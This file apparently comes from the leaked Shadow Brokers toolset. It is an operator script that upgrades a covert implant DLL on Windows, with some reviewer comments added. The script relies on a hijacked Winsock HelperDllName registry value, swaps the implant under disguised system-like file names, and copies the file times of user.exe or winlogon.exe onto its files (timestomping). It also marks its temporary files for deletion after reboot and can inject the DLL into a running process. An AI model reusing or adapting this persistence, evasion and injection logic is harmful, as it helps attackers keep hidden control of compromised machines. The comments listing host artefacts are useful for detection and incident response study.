shadowbrokers-exploits/windows/Resources/Pc/Scripts/Install/winnt/WinsockHelp/_Upgrade.dss
2017-04-14 11:45:07 +02:00


@include "_File.dsi";
@include "_Paths.dsi";
@include "_Processes.dsi";
@include "_Versions.dsi";
@include "windows/_RegistryIncludes.dsi";
@echo off;
@disablewow64 on;
# _Upgrade.dss -- swaps an already-installed "PC" Winsock helper DLL for a new
# build, in place, and optionally injects the new build into a running process.
#
# Usage: _Upgrade.dss <localFile> <procName>
#   localFile  local path of the new DLL to upload ($argv[1])
#   procName   name of the process to inject into ($argv[2]); an empty string
#              skips the process lookup
#
# This script only *upgrades*: it refuses to run unless the Winsock
# HelperDllName registry value already points at the install path/name the
# operator confirms via the GetInput prompts below.
#
# Host artefacts this script creates or modifies (relevant for detection / IR):
#   - the install DLL (default %SystemRoot%\System32\wshencrp.dll), overwritten
#   - two temporary DLLs in the same directory (default wshencrt.dll, the
#     uploaded copy, and wshencrr.dll, the displaced old DLL), both marked for
#     deletion after reboot
#   - on x64, an extra copy under SysWOW64 named like the install DLL
#   - file times on all of the above set to match a legitimate system binary
#     (user.exe, or winlogon.exe on x64), presumably so they blend in
#
# Returns true on success, false after any failed step (recovery is attempted
# for the file-swap steps; later steps only warn and continue).
if ($argc != 3)
{
# NOTE(review): "parmeters" is a typo in the operator-facing message.
echo("* Invalid parmeters", ERROR);
echo();
echo("Usage: $argv[0] <localFile> <procName>");
return false;
}
string $localFile = $argv[1];
string $procName = $argv[2];
string $arch;
# Target architecture (compared against "x64" below); helper from an include.
_GetArch($arch);
# Registry location whose HelperDllName value names the Winsock helper DLL
# this install hijacks.
string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock";
string $regKeyValue = "HelperDllName";
# Default install directory in unexpanded %SystemRoot% form ("\%" is
# presumably the script escape for a literal percent sign -- confirm). Any
# path still equal to this default is replaced by the real system path below.
string $defaultPath = "\%\%SystemRoot\%\%\\System32";
# get install name and path
# Three name/path pairs: the permanent install file, a temporary "load" copy
# (the uploaded new build) and a temporary "delete" name (where the old DLL is
# moved to). GetInput(prompt, out, default) -- argument order inferred from
# use; the operator may override each default interactively.
string $payloadPath = $defaultPath;
string $payloadName = "wshencrp.dll";
string $payloadLoadPath = $defaultPath;
string $payloadLoadName = "wshencrt.dll";
string $payloadDeletePath = $defaultPath;
string $payloadDeleteName = "wshencrr.dll";
if (!GetInput("PC DLL install path", $payloadPath, $payloadPath) ||
!GetInput("PC DLL install name", $payloadName, $payloadName) ||
!GetInput("PC DLL temporary (to load) path", $payloadLoadPath, $payloadLoadPath) ||
!GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) ||
!GetInput("PC DLL temporary (to delete) path", $payloadDeletePath, $payloadDeletePath) ||
!GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName))
{
echo("* Failed to get PC names and paths", ERROR);
return false;
}
# get the system path
# Real system directory on the target (used wherever $defaultPath was kept).
string $sysPath;
if (!_GetSystemPath($sysPath))
{
echo("* Failed to get system path", ERROR);
return false;
}
# get the HelperDllName value
# Read the current HelperDllName ("L" presumably selects HKLM -- confirm). A
# missing or undefined value is normalised to "" so the comparison below fails
# cleanly instead of on an undefined string.
string $origKeyValue;
if (!_GetRegistryValue("L",
$regKey,
$regKeyValue,
$origKeyValue) || !defined($origKeyValue))
{
$origKeyValue = "";
}
# Precondition: the registry must already name our install file, compared as
# a raw string against the *unexpanded* "$payloadPath\$payloadName". No path
# normalisation or case folding is done, so an otherwise valid install whose
# value is stored in a different form (e.g. expanded) would be rejected here
# -- cannot tell from this file which form the installer writes.
if ($origKeyValue != "$payloadPath\\$payloadName")
{
echo("* Failed to find $payloadPath\\$payloadName in $regKeyValue key", ERROR);
return false;
}
# get the process id for injection
# Optional: resolve $procName to a PID for the injectdll step at the end.
# A failed lookup only echoes; $id stays undefined and the operator is asked
# whether to continue without injection.
int $id;
if (prompt("Do you want to perform injection (for instant-grat)? Answer NO if using the same host process as old version!", false))
{
if (StrLen($procName) > 0)
{
if (!_FindProcessOnList($procName, $id) || !defined($id))
{
echo("* Failed to find $procName", ERROR);
}
}
# make sure the user wants to keep going if we don't have a process
if (!defined($id))
{
echo("No process for injection", ERROR);
if (!prompt("Continue?"))
{
return false;
}
}
}
# Resolve the three directories: any that is still the unexpanded default is
# replaced with the real system path; operator-supplied paths are used as-is.
string $usePath = $payloadPath;
if ($usePath == $defaultPath)
{
$usePath = $sysPath;
}
string $useLoadPath = $payloadLoadPath;
if ($useLoadPath == $defaultPath)
{
$useLoadPath = $sysPath;
}
string $useDeletePath = $payloadDeletePath;
if ($useDeletePath == $defaultPath)
{
$useDeletePath = $sysPath;
}
# Three-step swap so the in-use install DLL is never overwritten directly:
#   1. upload the new build under the temporary "load" name
#   2. move the old install DLL aside to the temporary "delete" name
#   3. copy the uploaded file to the permanent install name
# Each step undoes the previous ones on failure. The two temporaries are
# left on disk (and timestomped) until reboot; presumably because the old
# DLL may still be mapped and cannot be deleted immediately -- confirm.
# upload the new file
echo "Uploading new PC";
if (!`put "$localFile" -name "$useLoadPath\\$payloadLoadName" -permanent`)
{
echo(" FAILED", ERROR);
pause;
return false;
}
echo(" FINISHED", GOOD);
# move the old file
echo "Moving old PC";
if (!`move "$usePath\\$payloadName" "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
# Recovery for step 2: only the uploaded copy needs removing.
if (!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
# copy the new file to it's final location
echo "Copying new PC to permanent location";
if (!`copy "$useLoadPath\\$payloadLoadName" "$usePath\\$payloadName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
# Recovery for step 3: put the old DLL back, then remove the uploaded copy.
if (!`move "$useDeletePath\\$payloadDeleteName" "$usePath\\$payloadName"` ||
!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
# Legitimate system binary whose file times are copied onto our files below.
string $matchName = "user.exe";
if ($arch == "x64")
{
# alternative match name for x64.
$matchName = "winlogon.exe";
# On x64 a same-named DLL is also placed under SysWOW64. The comment at the
# "orig" fallback below calls this "this bug": the script treats a missing
# SysWOW64 copy as something to repair, and it is never treated as fatal.
echo "Copying SysWOW64 helper DLL";
string $homonymousDll;
$homonymousDll = "$sysPath\\$payloadName";
# NOTE(review): the substitution pattern is lowercase "system32"; whether it
# matches a $sysPath spelled "System32" depends on RegExSub being
# case-insensitive, which this file does not show. If it is not, this path
# silently stays in System32 and the copy below overwrites the install DLL
# with the SysWOW64 source.
RegExSub("system32","SysWOW64",$homonymousDll);
# First see if we're upgrading from a PC install that was aware of this bug:
if(_FileExists($homonymousDll))
{
echo(" DONE ALREADY (OK)", GOOD);
}
else
{
# In the normal case, the "orig" file will exist, use that (would be a copy of wshtcpip if PC installed).
# Otherwise, fall back to wshtcpip.dll (someone else broke it, we'll fix it anyway).
string $origSW64Dll;
$origSW64Dll = $origKeyValue;
# Strip everything up to and including the last backslash, i.e. keep just
# the file name from the registry value (global mode so the greedy ".*"
# consumes all preceding separators).
@regex-global on;
RegExSub("^.*\\\\", "", $origSW64Dll);
@regex-global off;
$origSW64Dll = "$sysPath\\$origSW64Dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
if(!_FileExists($origSW64Dll))
{
# Upgrading from 2.2 and prior, this is actually the expected path, no need to warn here.
$origSW64Dll = "$sysPath\\wshtcpip.dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
}
if(!_FileExists($origSW64Dll))
{
echo(" FAILED (no $origSW64Dll)", ERROR);
pause;
# continue...
}
else
{
# NOTE(review): unlike every other backtick command in this script the two
# paths are not quoted, so a directory containing a space would break here.
if(!`copy $origSW64Dll $homonymousDll`)
{
echo(" FAILED (could not copy source)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
echo "Matching SysWOW64 filetimes";
if (!`matchfiletimes -src "$origSW64Dll" -dst "$homonymousDll"`)
{
echo(" FAILED (times not matched)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
}
}
}
}
# Timestomp: give the install DLL and both temporaries the file times of
# $matchName (-src/-dst direction inferred from the argument names). Failure
# is only a WARNING; the upgrade proceeds regardless.
echo "Matching filetimes with $matchName";
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$payloadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useLoadPath\\$payloadLoadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", WARNING);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
# mark the temp files for deletion
# Return values are not checked; if either request fails the temporaries
# persist across reboots with no message to the operator.
`delete -file "$useLoadPath\\$payloadLoadName" -afterreboot`;
`delete -file "$useDeletePath\\$payloadDeleteName" -afterreboot`;
if (defined($id))
{
# inject the DLL
# Injects the temporary "load" copy by bare file name, not the permanent
# install file: presumably so it does not collide with the old build already
# mapped under the permanent name, and relying on the loader to find the
# bare name in the system directory -- neither is shown here, confirm.
echo "Injecting DLL";
if (!`injectdll -library $payloadLoadName -id $id`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" INJECTED", GOOD);
}
}
echo "Upgrade Finished";
echo "$regKeyValue : '$origKeyValue'";
pause;
return true;